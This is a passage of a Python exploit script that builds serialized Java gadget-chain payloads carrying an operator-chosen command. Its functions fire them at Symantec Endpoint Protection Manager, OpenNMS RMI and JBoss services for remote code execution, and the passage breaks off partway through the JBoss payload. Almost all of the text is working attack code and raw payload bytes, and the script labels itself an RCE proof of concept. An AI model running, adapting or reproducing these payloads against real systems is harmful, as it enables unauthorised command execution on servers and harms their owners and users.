(@roo7break) v %s\r\n \r\n\"\"\" % version\r\n \r\ndef hex2raw3(teststr):\r\n \"\"\"\r\n This function takes a string (expecting hexstring) and returns byte string\r\n \"\"\"\r\n # From: HexToByte() at http://code.activestate.com/recipes/510399-byte-to-hex-and-hex-to-byte-string-conversion/\r\n bytes = []\r\n teststr = ''.join( teststr.split(\" \") )\r\n for i in range(0, len(teststr), 2):\r\n bytes.append( chr( int (teststr[i:i+2], 16 ) ) )\r\n return \"\".join(bytes)\r\n \r\ndef symantec_endpoint_attack(HOST, PORT, SSL_On, _cmd):\r\n # The below code is based on the symantec_endpoint_prot_mgr_2015_6554.nasl script within Nessus\r\n \"\"\"\r\n This function sets up the attack payload for Symantec Endpoint\r\n \"\"\"\r\n \r\n java_payload = '\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x71\\x00\\x7e\\x00\\x00\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x04\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x76\\x72\\x00\\x25\\x63\\x6f\\x6d\\x2e\\x73\\x79\\x67\\x61\\x74\\x65\\x2e\\x73\\x63\\x6d\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x52\\x75\\x6e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0e\\x72\\x75\\x6e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x4c\\x69\\x6e\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x76\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1e\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x01\\x75\\x71\\x00\\x7e\\x00\\x20\\x00\\x00\\x00\\x03\\x74\\x00\\x07\\x63\\x6d\\x64\\x2e\\x65\\x78\\x65\\x74\\x00\\x02\\x2f\\x63\\x74\\x00'\r\n \r\n cleng = len(_cmd)\r\n java_payload += chr(cleng) + _cmd\r\n java_payload += '\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1b\\x73\\x71\\x00\\x7e\\x00\\x11\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x10\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x71\\x00\\x7e\\x00\\x3a'\r\n \r\n fullpayload = \"\"\"------=_Part_0_992568364.1449677528532\r\nContent-Type: application/binary\r\nContent-Disposition: form-data; name=\"Content\"\r\n \r\n%s \r\n \r\n------=_Part_0_992568364.1449677528532--\r\n\"\"\" % java_payload\r\n \r\n if SSL_On:\r\n webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r\n URL_ADDR = \"%s://%s:%s\" % ('https',HOST,PORT)\r\n else:\r\n webservice = httplib2.Http()\r\n URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r\n \r\n headers = {\"User-Agent\":\"Symantec_RCE_POC\",\r\n \"Content-type\":\"multipart/form-data;\",\r\n \"boundary\":\"----=_Part_0_992568364.1449677528532\",\r\n \"Accept\":\"text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\\r\\n\",\r\n \"Connection\":\"keep-alive\",\r\n \"Content-length\":\"%d\" % len(fullpayload)\r\n }\r\n resp, content = webservice.request(URL_ADDR+\"/servlet/ConsoleServlet?ActionType=SendStatPing\", \"POST\", body=fullpayload, headers=headers)\r\n # print provided response.\r\n print(\"[i] Response received from target: %s\" % resp)\r\n \r\ndef opennms_attack(HOST, PORT, _cmd):\r\n # The below code is based on the opennms_java_serialize.nasl script within Nessus\r\n \"\"\"\r\n This function sets up the attack payload for OpenNMS\r\n \"\"\"\r\n clen = len(_cmd)\r\n d1 = '\\x4a\\x52\\x4d\\x49\\x00\\x02\\x4b'\r\n d2 = '\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x00\\x00\\x00\\x50\\xac\\xed\\x00\\x05\\x77\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x15\\x4d\\xc9\\xd4\\xe6\\x3b\\xdf\\x74\\x00\\x05\\x70\\x77\\x6e\\x65\\x64\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0f\\x6a\\x61\\x76\\x61\\x2e\\x72\\x6d\\x69\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x70\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x0c\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x00\\x73\\x71\\x00\\x7e\\x00\\x05\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x70\\x78\\x71\\x00\\x7e\\x00\\x02\\x73\\x71\\x00\\x7e\\x00\\x05\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x70\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x70\\x78\\x70\\x76\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x70\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0a\\x67\\x65\\x74\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x24\\x73\\x71\\x00\\x7e\\x00\\x1c\\x75\\x71\\x00\\x7e\\x00\\x21\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x21\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x21\\x73\\x71\\x00\\x7e\\x00\\x1c\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x74'\r\n d2 += '\\x00' + chr(clen)\r\n d2 += _cmd\r\n d2 += '\\x74\\x00\\x04\\x65\\x78\\x65\\x63\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x29\\x73\\x71\\x00\\x7e\\x00\\x17\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x70\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x71\\x00\\x7e\\x00\\x09\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x10\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x71\\x00\\x7e\\x00\\x3f\\x78\\x71\\x00\\x7e\\x00\\x3f'\r\n \r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.bind((HOST, PORT))\r\n print(\"[i] Sending initial packets to OpenNMS RMI service\")\r\n s.sendall(d1)\r\n retdata = s.recv(8192)\r\n if retdata:\r\n #\r\n # We have received some data suggesting the OpenNMS RMI Registry has responded.\r\n # Time to exploit.\r\n #\r\n print(\"[+] OpenNMS RMI service responded. Sending the exploit code...\")\r\n s.sendall(d2)\r\n else:\r\n print(\"[-] Sorry, the RMI service didnt respond. Revert to manual attack.\")\r\n return 0\r\n \r\ndef jboss_attack(HOST, PORT, SSL_On, _cmd):\r\n # The below code is based on the jboss_java_serialize.nasl script within Nessus \r\n \"\"\"\r\n This function sets up the attack payload for JBoss\r\n \"\"\"\r\n body_serObj = hex2raw3(\"ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707371007E00007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F